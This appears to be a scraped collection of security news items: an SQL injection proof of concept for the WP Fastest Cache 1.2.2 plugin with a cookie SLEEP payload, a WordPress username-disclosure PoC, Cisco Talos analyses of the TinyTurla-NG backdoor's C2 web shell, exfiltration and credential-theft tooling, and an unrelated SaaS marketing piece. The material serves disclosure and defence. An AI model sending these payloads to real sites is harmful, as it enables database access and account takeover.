WordPress WP Fastest Cache plugin version 1.2.2 suffers from an unauthenticated remote SQL injection vulnerability.

    # Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2# Date: 14.11.2023# Exploit Author: Meryem Taşkın# Vendor Homepage: https://www.wpfastestcache.com/# Software Link: https://wordpress.org/plugins/wp-fastest-cache/# Version: WP Fastest Cache 1.2.2# Tested on: WP Fastest Cache 1.2.2# CVE: CVE-2023-6063 ## DescriptionAn SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication. ## Vuln Code public function is_user_admin(){            global $wpdb;            foreach ((array)$_COOKIE as $cookie_key => $cookie_value){                if(preg_match("/wordpress_logged_in/i", $cookie_key)){                     $username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);                     break;                }            }            if(isset($username) && $username){                            $res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`                                       FROM `$wpdb->users`                                       INNER JOIN `$wpdb->usermeta`                                       ON `$wpdb->users`.`user_login` = \"$username\" AND  # $username varible is not escaped vulnerable to SQL injection                                       ..... ## ExploitGET / HTTP/1.1Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221Host: meryem.local ## Parameter: Cookie #1* ((custom) HEADER)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg--- ## References- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063) ## Credits- Original Researcher: Alex Sanford- PoC: Meryem Taşkın

WordPress WP Fastest Cache 1.2.2 SQL Injection

A security vulnerability has been disclosed in the LiteSpeed Cache plugin for WordPress that could enable unauthenticated users to escalate their privileges.
Tracked as CVE-2023-40000, the vulnerability was addressed in October 2023 in version 5.7.0.1.
"This plugin suffers from unauthenticated site-wide stored [cross-site scripting] vulnerability and could allow any unauthenticated user

WordPress LiteSpeed Plugin Vulnerability Puts 5 Million Sites at Risk

A critical security flaw has been disclosed in a popular WordPress plugin called Ultimate Member that has more than 200,000 active installations.
The vulnerability, tracked as CVE-2024-1071, carries a CVSS score of 9.8 out of a maximum of 10. Security researcher Christiaan Swiers has been credited with discovering and reporting the flaw.
In an advisory published last week, WordPress

WordPress Plugin Alert - Critical SQLi Vulnerability Threatens 200K+ Websites

Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.

*   Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.

*   Talos also illustrates the post-compromise activity carried out by the operators of the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. We found three distinct sets of PowerShell commands issued to TTNG to enumerate, stage and exfiltrate files that the attackers found to be of interest.

*   Talos has also discovered the use of another three malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access, and carry out arbitrary command execution and credential harvesting.

*   One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems.

*   Certificate analysis of the Chisel client used in this campaign indicates that another modified chisel implant has likely been created that uses a similar yet distinct certificate. This assessment is in line with Turla’s usage of multiple variants of malware families including TinyTurla-NG, TurlaPower-NG and other PowerShell-based scripts during this campaign.

Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT in the compromise we’ve previously disclosed. The continued investigation also revealed details of the inner workings of the C2 scripts including handling of incoming requests and a WebShell component that allows the operators to administer the compromised C2 servers remotely.

**C2 server analysis**

The command and control (C2) code is a PHP-based script that serves two purposes: It’s a handler for the TinyTurla-NG implants and web shell that the Turla operators can use to execute commands on the compromised C2 server. The C2 scripts obtained by Talos are complementary to the TinyTurla-NG (TTNG) and TurlaPower-NG implants and are meant to deliver executables and administrative commands to execute on infected systems.

On load, the PHP-based C2 script will perform multiple actions to create the file structure used to serve the TTNG backdoor. After receiving a request, the C2 script first checks if the logging directory exists, if not, it will create one. Next, the script checks for a specific COOKIE ID. If it exists and corresponds to the hardcoded value, then the C2 script will act as a web shell.

It will base64 decode the value of the $\_COOKIE (not to be confused with the authentication COOKIE ID) entry and execute it on the C2 server as a command. These commands are either run using the exec(), passthru(), system(), or shell\_exec() functions. It will also check if the variable specified is a resource and read its contents. Once the actions are complete, the output or resource is sent to the requestor and the PHP script will stop executing.

C2 script’s web shell capability.

If there is an “id” provided in the HTTP request to the C2 server, the script will treat this as communication with an implant, such as TTNG or TurlaPower-NG. The “id” parameter is the same variable that is passed by the TTNG and TurlaPower-NG implants during communication with the C2 and creates the logging directory on the C2 server, as well. Depending on the next form value accompanying the “id”, the C2 will perform the following actions:

*   "**task**": Write the content sent by the requestor to the “<id>/tasks.txt” file and record the requestor’s IP address and timestamp in the “<id>/\_log.txt”. The contents of this file are then sent to the requestor in response to the “gettask” request. This mechanism is used by the attackers to add more tasks to the list of tasks/commands that each C2 must send to their backdoor installations to execute on the infected endpoints.

*   "**gettask**": Send the contents of the “<id>/tasks.txt” file to the infected system requesting a new command to execute on the infected endpoint.

*   "**result**": Get the content of the HTTP(S) form and record it into the “<id>/result.txt” file. The C2 uses this mechanism to obtain and record the output of a command executed on an infected endpoint by the TTNG backdoor into a file on disk.

*   "**getresult**": Get the contents of the “<id>/result.txt” file from the C2 server. The adversaries use this to obtain the results of a command executed on the infected endpoint without having to access the C2 server.

*   "**file**" + "**name**": Save the contents of the file sent to the C2 server either in full or part to a file specified on the C2 server with the same “name” specified in the HTTP form.

*   "**cat\_file**": Read the contents of a file specified by the requestor on the C2 server and respond with the contents.

*   "**rm\_file**": Remove/delete a file specified by the requestor from the C2 server.

The C2 script’s request handling logic.

The HTTP form values accepted by the C2 server “task”, “cat\_file”, “rm\_file”, “get\_result” and their corresponding operations on the C2 server indicate that these are part of an operational apparatus that allows the threat actors to feed the C2 server new commands and retrieve valuable information collected by the C2 server, _from a remote location_, without having to log into the C2 itself. Operationally, this is a tactic that is beneficial to the threat actors considering that all C2 servers discovered so far are websites compromised by the threat actor instead of being attacker-owned. Therefore, it would be beneficial for Turla’s operators to simply communicate over HTTPS masquerading as legitimate traffic instead of re-exploiting or accessing the servers through other means such as SSH thereby increasing their fingerprint on the compromised C2 servers.

This tactic can be visualized as:

**Instrumenting TinyTurla-NG to carry out post-compromise activity**

The adversaries use TinyTurla-NG to perform additional reconnaissance to enumerate files of interest on the infected endpoints and then exfiltrate these files. They issued three distinct sets of modular PowerShell commands to TTNG:

*   **Reconnaissance commands:** Used to enumerate files in a directory specified by the operator. The directory listing is returned to the operator to select interesting files that can be exfiltrated.

PowerShell script/Command enumerates files in four locations specified by the C2 and sends the results back to it.

*   **Copy file commands:** Base64-encoded commands/scripts issued to the infected systems to copy over files of interest from their original location to a temporary directory, usually: C:\\windows\\temp\\

PowerShell script copies files to an intermediate location.  

*   **Exfiltration** **commands/scripts aka TurlaPower-NG:** These scripts were used to finally exfiltrate the selected files to the C2 servers.

The scripts used during enumeration, copying and exfiltration tasks contain hardcoded paths for files and folders of interest to Turla. These locations consisted of files and documents that were used and maintained by Polish NGOs to conduct their day-to-day operations. The actors also used these scripts to exfiltrate Firefox profile data, reinforcing our assessment that Turla made attempts to harvest credentials, along with data exfiltration.

While Tinyturla-NG itself is enough to perform a variety of unauthorized actions on the infected system using a combination of scripts described above, the attackers chose to deploy three more tools to aid in their malicious operations:

*   Chisel: Modified copy of the Chisel client/agent.

*   Credential harvesting scripts: PowerShell-based scripts for harvesting Google Chrome or Microsoft Edge’s saved login data.

*   Tool for executing commands with elevated privileges: A binary that is meant to impersonate privilege levels of a specified process while executing arbitrary commands specified by the parent process.

The overall infection activity once TTNG has been deployed looks like this:

**Using Chisel as another means of persistent access**

Talos’ investigation uncovered that apart from TurlaPower-NG, the PowerShell-based file exfiltrator, the adversary also deployed another implant on infected systems. It’s a modified copy of the GoLang-based, open-source tunneling tool Chisel stored in the location: C:\\Windows\\System32\\TrustedWorker\[.\]exe

The modified Chisel malware is UPX compressed, as is common for Go binaries, and contains the C2 URL, port and communication certificate, and private keys embedded in the malware sample. Once it decrypts these artifacts, it continues to create a reverse SOCKS proxy connection to the C2 using the configuration: R:5000:socks

In the proxy:

*   **“R”:** Stands for remote port forwarding.
*   **“5000”**: This is the port on the attacker machine that receives the connection from the infected system.
*   **“socks”**: Specifies the usage of the SOCKS protocol. 

(The default local host and port for a socks remote in Chisel is 127\[.\]0\[.\]0\[.\]1:1080)

The C2 server that the chisel sample contacts is: 91\[.\]193\[.\]18\[.\]120:443.

The TLS configuration consists of a client TLS certificate and key pair. The certificate is valid from between Dec. 7, 2023 and Dec. 16, 2024. This validity falls in line with Talos’ assessment that the campaign began in December 2023. The issuer of the certificate is named as “dropher\[.\]com” and the subject name is “blum\[.\]com”.

TLS Certificate for the chisel malware used by Turla. 

During our data analysis, we found another certificate which we assessed with high confidence was also generated by Turla operators, but it's unclear if this was a mistake or they intended for the certificate to be used on another modified chisel implant. 

Certificate issuer DN.

The new certificate has the same issuer but in this case, the common name is _blum\[.\]com_ and the serial number is 0x1000. This certificate was generated one second before the one used in the modified chisel client/agent.

Turla also deployed two more tools to aid their malicious operations on the infected systems. One is used to run arbitrary commands on the system and the other is used to steal Microsoft Edge browser’s login data.

The first tool is a small and simple Windows executable to create a new command line process on the system by impersonating the privilege level of another existing process. The tool will accept a target Process Identifier (PID) representing the process whose privilege level is to be impersonated and the command line that needs to be executed. Then, a new cmd\[.\]exe is spawned and used to execute arbitrary commands on the infected endpoint. The binary was compiled in early 2022 and was likely used in previous campaigns by Turla.

The tool contains the embedded cmd\[.\]exe command line.

The second tool discovered by Talos is a PowerShell script residing at the location:

C:\\windows\\system32\\edgeparser.ps1

This script is used to find  login data from Microsoft Edge located at:

%userprofile%\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data

This data file and the corresponding decryption key for the login data extracted from the endpoint is archived into a ZIP file and stored in the directory: C:\\windows\\temp\\<filename>.zip

The script can be used to obtain credentials for Google Chrome as well but has been modified to parse login data from:

%userprofile%\\AppData\\Local\\Microsoft\\Edge

PowerShell script obtaining key and login data to add to the archive for exfiltration.

TTNG uses the privilege elevation tool to run the PowerShell script using the command:

"C:\\Windows\\System32\\i.exe" \_PID\_ "powershell -f C:\\Windows\\System32\\edgeparser.ps1"

This results in the tool spawning a new process with the command line:

C:\\Windows\\System32\\cmd.exe /c "powershell -f C:\\Windows\\System32\\edgeparser.ps1"

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCS**

IOCs for this research can also be found at our GitHub repository here.

**Hashes**

267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b  
d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40  
ad4d196b3d85d982343f32d52bffc6ebfeec7bf30553fa441fd7c3ae495075fc  
13c017cb706ef869c061078048e550dba1613c0f2e8f2e409d97a1c0d9949346  
b376a3a6bae73840e70b2fa3df99d881def9250b42b6b8b0458d0445ddfbc044

**Domains**

hanagram\[.\]jp  
thefinetreats\[.\]com  
caduff-sa\[.\]ch  
jeepcarlease\[.\]com  
buy-new-car\[.\]com  
carleasingguru\[.\]com

**IP Addresses**

91\[.\]193\[.\]18\[.\]120

TinyTurla-NG in-depth tooling and command and control analysis

By Uzair Amir
Learn about different types of SaaS solutions and the most widely used SaaS categories to create your own…
This is a post from HackRead.com Read the original post: Types of SaaS Applications: Categories and Examples

Learn about different types of SaaS solutions and the most widely used SaaS categories to create your own successful Software as a Service product!

Today, almost any company, from small startups to large enterprises, uses SaaS solutions in its day-to-day operations. With various types of SaaS products becoming essential for business operations, more and more companies are considering building SaaS applications.

If you want to know how to build a SaaS app, learning about the types and categories of these solutions is critical. With this knowledge, you can create a more comprehensive blueprint for your future product and have a deeper understanding of the modern SaaS market.

****About SaaS solutions****

Software as a Service (SaaS) is a software distribution model that allows users to access applications via the Internet on a subscription basis. SaaS is a subset of cloud computing due to the absolute majority of software-as-a-service apps being cloud-based.

Unlike traditional desktop apps, you don’t need to download and install SaaS solutions. Cloud computing allows users to enjoy all of the features and functionalities using remote servers.

The SaaS model began to gain traction in the late 1990s due to the success of web-based CRM systems, such as Salesforce. With the emergence of affordable cloud providers, many companies started to build SaaS products. Let’s talk about the main advantages of the SaaS model:

*   **Cost-effectiveness.** Companies and individuals can usually choose the one that fits them best from several subscription plans. Almost any SaaS offering will still be cheaper than buying traditional software, plus there is no need to spend money on hardware and infrastructure, the responsibility for maintenance, upgrades, and scalability lies with cloud service providers.
*   **Accessibility.** Cloud-based SaaS applications can be accessed from any device with an internet connection and web browser. With just a web browser, users can interact with Software as a Service product without the need to install or update anything manually.
*   **Scalability.** Scalability is often an issue for web applications and websites with traditional, client-server architecture. But you don’t need to worry about how to build a SaaS website or app that can provide scalability without sacrificing performance. Cloud services allow businesses to scale their product back and forth without significant investments or operational downtime.
*   **Security.** Protecting sensitive data is one of the main tasks in the modern software development industry. Reliable cloud providers offer a high level of security due to their decentralized nature. With information being stored in several places at once, it is more difficult for malicious actors to access it.

****SaaS categories****

When experts in SaaS application development describe different types of SaaS solutions, we can often hear two terms: _horizontal_ and _vertical_. An experienced SaaS development company can consult you on which type of app you need, but it is still essential to have a basic understanding of these classifications yourself. Let’s talk about these two categories:

*   **Horizontal SaaS.** If you wonder how to develop a SaaS application that will meet the needs of businesses across multiple industries, horizontal solutions are for you. These products offer features and services that can be applied to various business settings. Horizontal SaaS platforms are often used for improving day-to-day operations, streamlining processes, and increasing productivity.
*   **Vertical SaaS.** If you, on the other hand, want to develop a SaaS application that is designed to meet the needs of a specific industry or organization type, this option is perfect for you. Vertical Software as a Service product is used in healthcare, retail, fintech, and governmental projects. You need specific SaaS development expertise in your team to create vertical apps.

****Types of SaaS Applications****

Vertical and horizontal are the key types of Software as a Service solution, but to know how to build SaaS applications with impressive functionalities and competitive advantage, you need to learn about the most widely used categories of SaaS.

****CRM software****

This is one of the most popular types of B2B SaaS software that almost any company has experience with. Customer Relationship Management (CRM) system is an essential part of any business workflow and enables companies to keep track of customer data and gain valuable insights about clients’ preferences and behaviour.

Most of the modern CRM solutions offer task automation, advanced analytics, and even predictive analysis based on customer data. The most well-known CRM software today are Salesforce, Hubspot, Zoho, and Microsoft Dynamics 365.

If you want to learn more about developing SaaS applications like these, take a closer look at their core features and implementation of cutting-edge technologies like AI and ML, and consult with a SaaS application development company that has successful cases of building CRM SaaS products.

****CMS software****

Content Management Systems (CMS) enable individuals with no experience in the software development process to create and manage web pages and digital content. Unlike the majority of SaaS types on our list, CMS is not designed specifically for business use, but companies still can benefit from them, creating basic websites without a development team.

Today, there are four top CMS SaaS products: WordPress, Drupal, Shopify, and Joomla. Each solution has its long list of pros and cons, struggling in certain aspects and excelling in others.

To build a SaaS app that will be as good if not better than these five, you need to not only have a good understanding of the SaaS model and have a reliable SaaS app development partner but also to become familiar with the most widely used CMS SaaS products and their features and functionalities.

****ERP software****

Enterprise Resource Planning (ERP) software is used by companies of any size for managing business processes. These SaaS applications offer such features as inventory and order management, operations scheduling, customer relationships management, and handling of accounting tasks. Many ERP solutions try to integrate CRM, project management, accounting, and HR modules, making them the types of SaaS software that companies need for managing day-to-day operations.

The most prominent players in the ERP industry are SAP, Oracle, NetSuite, and Microsoft Dynamics 365. As you can see, Microsoft Dynamics appears in our list in the second category already due to its different functionalities and features that can be used in various processes. It can serve as a lesson for anyone interested in how to create a SaaS application that is always in demand.

****Project management software****

Project management tools are widely used today for planning, executing, and monitoring projects. They help to improve efficiency by creating workflows, enabling teams to keep track of different tasks, and reducing the chance of miscommunications and errors. Modern project management software also leverages AI capabilities for repetitive task automation, data visualization, and report generation.

The most successful SaaS project management tools today are Trello, Asana, Jira, Microsoft Project, and Notion. These solutions offer essential features and capabilities needed for efficient project management, but each one has its own unique additions and distinct user interface. By researching these tools, you can learn how to create SaaS applications that can be used for project management tasks by companies from different industries.

****HR software****

Human Resources (HR) software enables organizations to seamlessly manage employee data and create a streamlined HR process from recruitment to retirement. It allows companies to save time, administrative resources, and money. No wonder that more and more SaaS development companies have decided to develop SaaS applications for HR purposes.

The most widely used and acclaimed HR software products are SAP, ADP, Workday, Zoho People, and BambooHR. These tools not only provide features and capabilities for managing all of an organization’s HR operations but also work seamlessly with third-party integrations and offer robust analytics. Of all the types of SaaS products, this is one of the most promising ones, considering that businesses of any size and industry have employees and HR tasks that need solving from time to time.

****Accounting and billing software****

Every company needs tools for processing payments and managing finances. Accounting and billing SaaS solutions offer an efficient and cost-effective way to control finances and streamline operations. The most widely used accounting Software as a Service platforms are Xero, QuickBooks Online, and Freshbooks. All of these solutions offer such benefits as easier compliance with regulations, real-time data insights, and improved collaboration between departments.

As for billing software, it is crucial to find reliable solutions with perfect reputations. Among the most well-known and established payment gateways you can integrate within your platform during SaaS platform development are PayPal and Stripe. By researching and comparing accounting and billing software, you can gain valuable insights into building a SaaS product for efficient financial management.

****Communication software****

During the global pandemic, communication software grew in popularity beyond the boldest projections, and today, more and more companies dream of building a SaaS platform that will be used for remote work and corporate communication.

The most popular SaaS communication software today is Slack, Google Meets, Zoom, Skype, and Microsoft Teams. Most of these tools are free, with some additional features available for an extra price. Modern communication tools provide such capabilities as file sharing, screen sharing, chat recording, and remote control. With remote work becoming more and more popular, developing SaaS applications for communication and collaborations seems like a safe bet and an excellent investment.

****Conclusion****

With numerous types of SaaS services available today, it can be easy to get confused, but a deep understanding of these basics is the first step to becoming a real expert in SaaS software development. Of course, you can just hire a SaaS application development services provider; however, without your input at the planning stage and a clear vision for the final product, chances for success are much lower.

After choosing the type of Software as a Service product you want to develop, you and your development team can choose the right tech stack, avoid many SaaS application development challenges, and build the SaaS application of your dreams.

****RELATED ARTICLES****

1.  **20 Best Amazon PPC Management Agencies**
2.  **SaaS Security Best Practices: Safeguard Consumer Data**
3.  **15 Best SaaS SEO Experts That Will Help You Dominate Online**
4.  **How To Reduce Cost Overruns For AI Implementation Projects**
5.  **The Role of DevOps in Streamlining Cloud Migration Processes**

Types of SaaS Applications: Categories and Examples

WordPress versions 6.4.3 and below appear to suffer from a REST API related username disclosure vulnerability.

    # Title: wordpress 6.4.3 - Username Disclosure# Author: h4shur# date:2024-02-21# Vendor Homepage: https://www.wordpress.org# Software Link: https://www.wordpress.org/download# Version:  6.4.3 and earlier# Tested on: Windows 10 & Google Chrome# Category : Web Application Bugs### Description :the REST API allows simulating different request types. As such, we canperform a POST request with the “users” string in the body of the request,and tell the REST API to act like it’s received a GET request.You can see the management username in the "slug" feature. And evensecurity plugins like "iThemes Security" do not block this path.### POC :https://target.com/wp-json/?rest_route=/wp/v2/users/# output :[{"id":1,"name":"admin","url":"https:\/\/target.com","description":"","link":"https:\/\/target.com\/?author=1","slug":"admin_1l","avatar_urls":{"24":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=24&d=mm&r=g","48":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=48&d=mm&r=g","96":"https:\/\/secure.gravatar.com\/avatar\/f796ffd8af7172647b2f54ce8104919e?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"collection":[{"href":"https:\/\/target.com\/index.php?rest_route=\/wp\/v2\/users"}]}}]### Admin Panel :https://target.com/wp-adminhttps://target.com/login.php### contact :h4shursec@gmail.comtwitter.com/h4shurinstagram.com/h4shurt.me/h4shur

WordPress 6.4.3 Username Disclosure

A critical security flaw in the Bricks theme for WordPress is being actively exploited by threat actors to run arbitrary PHP code on susceptible installations.
The flaw, tracked as CVE-2024-25600 (CVSS score: 9.8), enables unauthenticated attackers to achieve remote code execution. It impacts all versions of the Bricks up to and including 1.9.6.
It has been addressed by the theme developers in&

WordPress Bricks Theme Under Active Attack: Critical Flaw Impacts 25,000+ Sites

This new backdoor we’re calling “TinyTurla-NG” (TTNG) is similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation.

Thursday, February 15, 2024 08:00

*   Cisco Talos has identified a new backdoor authored and operated by the Turla APT group, a Russian cyber espionage threat group. This new backdoor we’re calling “TinyTurla-NG” (TTNG) is similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation.
*   Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems.
*   TinyTurla-NG was seen as early as December 2023 targeting a Polish non-governmental organization (NGO) working on improving Polish democracy and supporting Ukraine during the Russian invasion. 
*   We’ve also discovered previously unknown PowerShell scripts we’re calling “TurlaPower-NG '' that are meant to act as file exfiltrators. TinyTurla-NG deployed these scripts to exfiltrate key material used to secure the password databases of popular password management software, indicating a concerted effort for Turla to steal login credentials.

Talos, in cooperation with CERT.NGO, investigated another compromise by the Turla threat actor, with a new backdoor quite similar to TinyTurla, that we are calling TinyTurla-NG (TTNG). Our findings indicate that Polish non-governmental organizations (NGOs) are actively being targeted, with at least one of them supporting Ukraine. While NGOs aren’t directly involved in conflicts they frequently participate in providing aid to entities suffering through the conflicts. Aggressor parties may deem it strategically beneficial to monitor such NGOs to keep track of ongoing and potentially new aid packages for their victims.

Turla has been widely known to target entities across the world using a huge set of offensive tools in geographies including the U.S., European Union, Ukraine and Asia. They’ve previously used malware families such as CAPIBAR and KAZUAR to target Ukrainian defense forces. After Crutch and TinyTurla, Turla has now expanded its arsenal to include the TinyTurla-NG and TurlaPower-NG malware families, while also widening its net of targets to NGOs. This activity signals the adversary’s intention to expand both their suite of malware as well as a set of targets to support Russia’s strategic and political goals.

Talos identified the existence of three different TinyTurla-NG samples, but only obtained access to two of them. This campaign’s earliest compromise date was Dec. 18, 2023, and was still active as recently as Jan. 27, 2024. However, we assess that the campaign may have started as early as November 2023 based on malware compilation dates. 

In this campaign, Turla uses compromised WordPress-based websites as command and control endpoints (C2) for the TTNG backdoor. The operators used different websites running vulnerable WordPress versions (versions including 4.4.20, 5.0.21, 5.1.18 and 5.7.2), which allowed the upload of PHP files containing the C2 code consisting of names such as: rss-old\[.\]php, rss\[.\]old\[.\]php or block\[.\]old\[.\]php

**TinyTurla-NG uses PowerShell and a command line to run arbitrary commands**

During the campaign’s three-month run, different C2 servers were also used to host PowerShell scripts and arbitrary commands that could then be executed on the victim machine.

Like TinyTurla, the malware is a service DLL, which is started via svchost.exe. The malware code itself is different and new. Different malware features are distributed via different threads. The malware is using Windows events for synchronization. In the DLL’s ServiceMain function, the first main malware thread is started.

TinyTurla-NG DLL starting the main infection thread.

The InitCfgSetupCreateEvent function initializes the config variables and the event which is used for synchronization later on. 

De-facto main function of the DLL calling code to initiate threads.

This thread then starts two more threads via the CheckOSVersion\_StartWorkerThreads function.

CheckOSVersion\_Start\_WorkerThreads function.

After checking the PowerShell and Windows versions, the first thread starts to beacon to the C2 by sending a campaign identifier (“id”) and the message “Client Ready” to register the successful infection with the C2. This is done in the C2\_client\_ready function in the screenshot below.

Thread No. 1: C2 beaconing thread.

If the registration is successful, the TTNG backdoor will ask the C2 for a task to execute (gettask\_loop function). The second thread, which was started by the CheckOSVersion\_Start\_WorkerThreads function, is responsible for executing the task command sent from the C2. It waits until the TTNG backdoor has received the response from the C2. The synchronization between the two threads is performed via the Windows event mentioned earlier. The first thread triggers the event (in the thread1\_function) once it has successfully received the task from the C2.

Thread No. 1 signals Thread No. 2 to handle the task/command received from the C2.

The tasks can be executed either using a PowerShell or command (cmd.exe) shell. The decision is made based on the PowerShell version running on the victim machine.

Thread No. 2: Windows command execution function.

When executing commands via cmd.exe or PowerShell.exe, TinyTurla-NG will create pipes to input and read the output of the commands. While executing commands via cmd.exe, the backdoor first executes the command chcp 437 > NULexecute to set the active console page to 437, i.e., the U.S., and then execute the commands issued by the C2. 

However, while executing commands via PowerShell.exe, TinyTurla-NG will additionally execute the following PowerShell cmdlet to prevent the recording of command history:

Set-PSReadLineOption -HistorySaveStyle SaveNothing

In addition to executing the content of the task received from the C2 directly e.g., C:\windows\system32\malware.exe, the backdoor will accept the following command codes from the C2. These command codes can be meant for administering the implant or for file management:

*   **“timeout”**: Change the number of minutes the backdoor sleeps between asking the C2 for new tasks. The new timeout is one minute multiplied by the timeout parameter sent by the C2. For example, if the C2 sends the task “timeout 10”, then the backdoor will now sleep for 10 minutes. If it is given a third parameter, the fail counter is changed, too.

TTNG setting a timeout value for C2 communication.

*   **“changeshell”**: This command will instruct the backdoor to switch the current shell being used to execute commands, i.e., from cmd.exe to PowerShell.exe, or vice versa.
*   **“changepoint”**: This command is used to likely tell the implant to switch to the second C2 URL present in the implant.
*   **“get”**: Fetch a file specified by the C2 using an HTTP GET request and write it to the specified location on disk.
*   **“post”**: Exfiltrate a file from the victim to the C2, e.g., post C:\some_file.bin.
*   **“killme”**: Create a BAT file (see below) with a name based on the current tick count. Then, use the BAT file to delete a file from the disk of the victim machine, e.g., killme <filename>. The BAT file is executed via cmd.exe /c <BAT-file-name>.bat. 

The killme command generates a batch file with the content below. It is interesting to note that the backdoor DLL is essentially a service, however, the batch script deletes a registry key in HKCU\SW\classes\CLSID and restarts explorer\[.\]exe indicating an attempt to create persistence using COM hijacking, a tactic Turla has used in the past to establish persistence for their malware.

Registry key deleted:

HKEY\_CURRENT\_USER\\Software\\Classes\\CLSID\\{C2796011-81BA-4148-8FCA-C6643245113F}

BAT file contents template.

The BAT file is created from the template where the first two “%s” are replaced with the DLL name and the last one with the name of the BAT file itself to delete both artifacts from the disk.

**TurlaPower-NG and its exfiltration capabilities**

Talos also discovered malicious PowerShell scripts we’re calling “TurlaPower-NG”, written to infected endpoints via the TTNG backdoor. The scripts consist of the C2 URL and target file paths. For each file path specified, the script will recursively enumerate files and add them to an archive on disk. TurlaPower-NG takes specific care to exclude files with the “.mp4” extension from being added to the archive. The attackers had a specific interest in key material used to secure the password databases and popular password management software, adding related files to the archive:

TurlaPower-NG’s file archiving function.

The archive is a “.zip” extension whose name is generated on the fly by generating a new GUID which is used as the archive name. The archive file is then exfiltrated to the C2 using HTTP/S POST requests along with a log of the activity performed being sent to the C2 as well. The log consists of:

*   Name of the archive file (or part) POSTed to the C2.
*   Number of files in the archive along with the archive size.

TurlaPower-NG’s archive filename generation and log generation for C2.

**C2 setup and operations**

All of the C2 servers discovered so far consist of legitimate, vulnerable WordPress-based websites compromised by Turla to set up their C2 servers. Once compromised the operators set up scripts, logging and data directories to operate their C2 servers.

**Directory and file structure**

The C2’s directories and files setup consists of three key components:

*   **C2 scripts**: Turla set up PHP scripts ending with extensions — “.old.php” — in certain directories of the compromised websites. The URLs for these PHP-based C2s were then coded into the TTNG backdoors consisting of two C2 URLs per sample.
*   **Logging**: In addition to the C2 PHP scripts, the adversary also set up the logging of infections to keep track of infected systems and commands being issued to them. The logging mechanism of the C2 generates three log files on the C2 server:
    *   **\_log\[.\]txt**: A log of all infected endpoints beaconing into the C2.
    *   **result\[.\]txt**: A log of all messages received from the TTNG backdoor.
    *   **tasks\[.\]txt**: A log of all commands issued to the infected hosts.
*   **Data directories**: TTNG and TurlaPower-NG both support the exfiltration of files to the C2 server. The C2 server stores stolen data in directories separate from the logging directories.

Sample directory listing of the logs of the C2 server.

**C2 communication process**

The TinyTurla-NG backdoor uses a specific Identifier, “id” value in its HTTP form data whenever it communicates with the C2 server. This ID value is an eight-character phrase hardcoded into the backdoor. 

Network capture displaying the Identifier value and “Client Ready” message.

This same identifier value is then used to create directories for log files on the C2 server indicating that the C2 server maintains different log files for different identifiers.

After registering the victim on the C2 server, the backdoor sends out a gettask request, similar to the one below. The C2 can answer this with special commands or just the file that is supposed to be executed on the infected machine. 

TTNG’s C2 communication to fetch tasks to perform on the infected endpoint.

Depending on the PowerShell version running on the victim machine, the C2 task commands are piped into a PowerShell or cmd\[.\]exe shell. 

TinyTurla-NG’s shell selection between PowerShell or cmd\[.\]exe.

**Coverage**

Ways our customers can detect and block this threat are listed below.

